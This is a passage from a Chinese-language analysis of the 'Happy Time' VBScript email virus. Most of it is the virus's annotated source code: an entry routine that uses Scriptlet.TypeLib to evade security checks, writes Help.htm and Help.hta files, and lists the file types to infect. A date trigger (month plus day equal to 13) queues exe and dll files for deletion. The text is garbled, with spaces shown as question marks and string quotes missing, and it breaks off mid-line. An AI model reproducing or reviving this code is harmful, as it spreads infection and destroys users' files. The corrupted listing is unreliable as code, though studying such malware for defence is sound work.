欢乐时光其实就利用了超文本邮件中可以夹带脚本语.docVIP

“欢乐时光”其实就是利用了超文本邮件中可以夹带脚本语言的特点而棋高一招的。我们知道，邮件的格式可以有两种：纯文本和超文本。超文本（HTML）功能强大就不用多说了，它可以内嵌数种脚本语言，常见的就是VBScript和JavaScript。“欢乐时光”在超文本中夹带的就是VBS。从源代码中可以看得出来，该作者很可能是长期从事网络编程的高手，他对VBS的认识可谓精通，使用的许多技术细节都鲜为人知，尤其是利用了类型库（Type?Library）成功地避开了安全审核的手段更是令人叹为观止。? 　　下面让我们来看看它藏在快乐的外衣下的是什么吧！? ***************?欢乐时光?*************** Rem?I?am?sorry!?happy?time On?Error?Resume?Next Mload ’以上为病毒入口，并加上I?am?sorry!?happy?time的注释，以表明此文件已被感染过。 Sub?mload() On?Error?Resume?Next mPath?=?Grf() Set?Os?=?CreateObject(Scriptlet.TypeLib)? Set?Oh?=?CreateObject(Shell.Application) ’建立枚举对象，避开了安全审核 If?IsHTML?Then ’调用IsHtml函数，如果是Html，就小写……? mURL?=?LCase(document.Location) If?mPath?=??Then Os.Reset? Os.Path?=?C:\Help.htm Os.Doc?=?Lhtml() Os.Write() ’如果mPath为空，就在C盘下生成Help.htm Ihtml?=? ’超文本的内容，并指向C:\Help.Htm Call?document.Body.insertAdjacentHTML(AfterBegin,?Ihtml) Else If?Iv(mPath,?Help.vbs)?Then setInterval?Rt(),?10000 Else m?=?hta If?LCase(m)?=?Right(mURL,?Len(m))?Then id?=?setTimeout(mclose(),?1) ’设置超时条件 main Else? Os.Reset() Os.Path?=?mPath??\??Help.hta Os.Doc?=?Lhtml() Os.write() Iv?mPath,?Help.hta ’生成Help.hta End?If End?If End?If Else Main ’都不是，就执行main函数? End?If End?Sub ’****************************************************************** ’以下为主函数，太长了！ Sub?main() On?Error?Resume?Next Set?Of?=?CreateObject(Scripting.FileSystemObject) ’不用说，创建FileSystemObject对象啦 Set?Od?=?CreateObject(Scripting.Dictionary) ’创建Dictionary对象,?用来保存数据键和项目对，它实际上是一个比较开放的数组 Od.Add?html,?1100? Od.Add?vbs,?0100 Od.Add?htm,?1100 Od.Add?asp,?0010 ’向Dictionary对象添加要感染的项目对 Ks?=?HKEY_CURRENT_USER\Software\ ’使用变量以减少代码长度? Ds?=?Grf() Cs?=?Gsf() If?IsVbs?Then ’如果是VBS? If?Of.FileExists(C:\help.htm)?Then? Of.DeleteFile?(C:\help.htm) ’如果c:\help.htm存在，就删掉，消灭遗留的痕迹 End?If Key?=?CInt(Month(Date)?+?Day(Date))? If?Key?=?13?Then? ’如果月与日之和为13（这也是它变种多的原因——将13改为其他数字即可） Od.RemoveAll Od.Add?exe,?0001 Od.Add?dll,?0001 ’就清空Dictionary数组，并将exe、dll加入Dictionary?对象，以备删除之用 End?If Cn?=?Rg(Ks??Hel